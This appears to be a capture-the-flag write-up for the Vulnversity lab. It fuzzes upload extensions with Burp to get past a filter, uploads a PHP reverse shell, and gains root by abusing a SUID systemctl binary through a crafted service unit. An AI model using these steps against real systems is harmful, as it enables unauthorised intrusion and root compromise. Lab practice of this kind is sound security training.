Skip to main content

Vulnversity

BURPSUITE

There is a Server Side Filtering which Prevents us from Uploading specific File Extensions. We can use BURP:Intruder to FUZZ file.[EXTENSION_TO_FUZZ] Extension to Find which one can be Uploaded.


  • In this case the Extension file.[phtml] is not Blacklisted.
POST /internal/index.php HTTP/1.1
Host: 10.10.242.24:3333
Content-Length: 283
Origin: http://10.10.242.24:3333
Referer: http://10.10.242.24:3333/internal/index.php
Connection: close

Content-Disposition: form-data; name="file"; filename="file.md" -► FUZZING `.md` Parameter to find the Allowed Extensions
Content-Type: text/markdown

  • The Reverse Shell got Successfully Uploaded to: [IP:3333/internal/uploads]
   [ICO]             Name            Last modified   Size Description
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[PARENTDIR] Parent Directory                            -  
[ ]         php-reverse-shell.phtml 2022-10-07 05:09 5.4K  
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Privilege Escalation

  • We can catch the Reverse Shell Using Netcat 
www-data@vulnuniversity /$  id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • The /bin/systemctl Binary has the SUID Bit Set.
www-data@vulnuniversity /$  find / -type f -perm -04000 -ls 2>/dev/null
   ...
   131166    648 -rwsr-xr-x   1 root     root         659856 Feb 13  2019 /bin/systemctl
   ...

  • We can copy the BASH Binary into the /tmp Folder and make the SYSTEMCTL Service set a SUID Bit on that Binary. 
www-data@vulnuniversity tmp$  TF=$(mktemp).service
www-data@vulnuniversity tmp$  TF=$(mktemp).service
www-data@vulnuniversity tmp$  echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cp /bin/bash /tmp && chown root:root /tmp/bash && chmod 4777 /tmp/bash"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity tmp$  systemctl link $TF
Created symlink from /etc/systemd/system/tmp.o1RIIbIg2b.service to /tmp/tmp.o1RIIbIg2b.service.
www-data@vulnuniversity tmp$  systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.o1RIIbIg2b.service to /tmp/tmp.o1RIIbIg2b.service.

  • Since the BASH Binary has the SUID Bit Set we can run with ROOT Permissions.
www-data@vulnuniversity tmp$  ./bash -p
www-data@vulnuniversity tmp$  id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
www-data@vulnuniversity tmp$  whoami
root